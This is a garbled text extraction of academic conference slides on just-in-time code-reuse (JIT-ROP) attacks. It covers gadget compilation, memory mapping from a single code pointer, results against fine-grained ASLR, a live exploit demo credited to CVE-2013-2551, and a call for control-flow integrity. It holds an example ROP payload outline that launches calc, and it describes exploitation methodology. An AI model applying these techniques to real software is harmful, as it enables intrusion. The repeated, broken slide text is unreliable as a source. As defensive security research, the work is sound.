Gadget 1 Gadget 2 Gadget 3 Gadget 5 Gadget 6 Gadget 4

LoadLibrary(“kernel32”); GetProcAddress(@, “WinExec”); @(“calc”, SW_SHOWNORMAL); LoadLibrary(“kernel32”); GetProcAddress(@, “ExitProcess”); @(1);

• ur high-level language

...

generate possible gadget arrangements fullfill with available gadgets

22 Thursday, August 1, 13

Compiling the ROP program

22 JumpG& LoadRegG& MovRegG&

gadgets available

Reimplementation of Q gadget compiler algorithms [Schwartz et al., USENIX 2011] extended for multiple program statements and function parameters

Gadget 1 Gadget 2 Gadget 3 Gadget 5 Gadget 6 Gadget 4

LoadLibrary(“kernel32”); GetProcAddress(@, “WinExec”); @(“calc”, SW_SHOWNORMAL); LoadLibrary(“kernel32”); GetProcAddress(@, “ExitProcess”); @(1);

• ur high-level language

...

generate possible gadget arrangements fullfill with available gadgets

22 Thursday, August 1, 13

Compiling the ROP program

22 JumpG& LoadRegG& MovRegG&

gadgets available

Reimplementation of Q gadget compiler algorithms [Schwartz et al., USENIX 2011] extended for multiple program statements and function parameters

Gadget 1 Gadget 2 Gadget 3 Gadget 5 Gadget 6 Gadget 4

Serialize

LoadLibrary(“kernel32”); GetProcAddress(@, “WinExec”); @(“calc”, SW_SHOWNORMAL); LoadLibrary(“kernel32”); GetProcAddress(@, “ExitProcess”); @(1);

• ur high-level language

...

generate possible gadget arrangements fullfill with available gadgets

22 Thursday, August 1, 13

Take it to the Next Level

23

Map Memory

Find Gadgets Find API Calls

Run Time

Optimize code throughout. Lower conservativeness at expense of complexity. Explore direct use of system calls. Improve ability to discern code from embedded data.

JIT

• ROP is only our initial prototype of just-in-time code reuse.

Potential Improvements:

Compile

Define more composite gadgets implementing an operation. Bigger changes: apply JIT code reuse to jump-oriented programming, return-less ROP , or ret-to-libc styles of code reuse.

23 Thursday, August 1, 13

Page Mapping Considerations

24

All other steps depend on the ability to map code pages well. Are there enough function pointers on the heap?

24 Thursday, August 1, 13

Assume only one code pointer initially accessible. (e.g. from a virtual table entry, callback, or event handler)

Page Mapping Considerations

24

All other steps depend on the ability to map code pages well. Are there enough function pointers on the heap?

24 Thursday, August 1, 13

Assume only one code pointer initially accessible. (e.g. from a virtual table entry, callback, or event handler)

Page Mapping Considerations

24

All other steps depend on the ability to map code pages well. Are there enough function pointers on the heap? Are code pages interconnected enough?

24 Thursday, August 1, 13

Assume only one code pointer initially accessible. (e.g. from a virtual table entry, callback, or event handler)

Page Mapping Considerations

24

All other steps depend on the ability to map code pages well. Tested on 7 Applications: Are there enough function pointers on the heap? Are code pages interconnected enough?

24 Thursday, August 1, 13

Experiment Design

25

For each application: Open Application with Blank Document Save Snapshot

• f

Program Memory

Build Native x86 Version of JIT

• ROP

Save Snapshot

• f

Program Memory Save Snapshot

• f

Program Memory Save Snapshot

• f

Program Memory Save Snapshot

• f

Program Memory Save Snapshot

• f

Program Memory Save Snapshots

• f

Program Memory

Map Memory

Find Gadgets Find API Calls Compile Use only one initial code pointer to kick-off memory mapping, repeat for all possible initializations

25 Thursday, August 1, 13

Experimental Results

26

Find Gadgets Find API Calls

Run Time Map Memory

300 500 100

median upper quartile

Pages harvested from a single initial code pointer

On average, 300 pages of code harvested.

lower quartile

26 Thursday, August 1, 13

Experimental Results

27

Map Memory

Find Gadgets Find API Calls

Run Time

15 10 5

median upper quartile

Find 9 to 12 on average, but only one needed.

GetProcAddress() LoadLibrary()

ASCII UNICODE

||

Using the LoadLibrary() and GetProcAddress() APIs, the generated ROP payload can lookup any other APIs needed.

similar results for all applications

27 Thursday, August 1, 13

Experimental Results

28

Map Memory

Find Gadgets Find API Calls

Run Time

100 150 50

median upper quartile lower quartile again, similar results for all applications

Usually find one or more of each gadget type.

jump pivot mvreg arith load store arithld arithsto

We only consider ‘xchg eax,esp’ for a stack pivot, this could be improved. Also tested against ‘gadget elimination’, e.g. ORP ¡ [Pappas ¡et ¡al., ¡IEEE ¡S&P ¡2012], which had little

• benefit. Some gadgets vanished, while new

gadgets appeared.

28 Thursday, August 1, 13

Experimental Results

29

Map Memory

Find Gadgets Find API Calls

Run Time

S e c

• n

d s t

• E

x p l

• i

t

Varies, but viable for real-world exploitation.

10 8 8 7 10 8 7 V8

15 22.5 7.5

CVE 2012 1876

string size

• verwrite

string size

• verwrite

format string disclosure

End-to-end live exploitation experiments with different environments and vulnerabilities.

29 Thursday, August 1, 13

Live ¡Demo ¡

10 8

Vulnerability Discovery: Metasploit Module for Win7/IE8: Nicolas Joly Juan Vazquez

Credits

CVE-­‑2013-­‑2551 ¡on

30 Thursday, August 1, 13

Conclusion

31

31 Thursday, August 1, 13

Conclusion

31

Fine-grained ASLR

• not sufficient against adversary with ability to

bypass standard ASLR via memory disclosure

31 Thursday, August 1, 13

Conclusion

31

Fine-grained ASLR

• not sufficient against adversary with ability to

bypass standard ASLR via memory disclosure

Quick Fix?

• re-randomize periodically [Giuffrida et al., USENIX 2012]
• performance trade-off is impractical

31 Thursday, August 1, 13

Conclusion

31

Fine-grained ASLR

• not sufficient against adversary with ability to

bypass standard ASLR via memory disclosure

Quick Fix?

• re-randomize periodically [Giuffrida et al., USENIX 2012]
• performance trade-off is impractical

Towards More Comprehensive Mitigations

• control-flow integrity

[Abadi et al., CCS 2005]

31 Thursday, August 1, 13

Conclusion

31

Fine-grained ASLR

• not sufficient against adversary with ability to

bypass standard ASLR via memory disclosure

Quick Fix?

• re-randomize periodically [Giuffrida et al., USENIX 2012]
• performance trade-off is impractical

Towards More Comprehensive Mitigations

• control-flow integrity

[Abadi et al., CCS 2005]

Need for Practical Solutions

• work towards efficient fine-grained CFI/DFI

31 Thursday, August 1, 13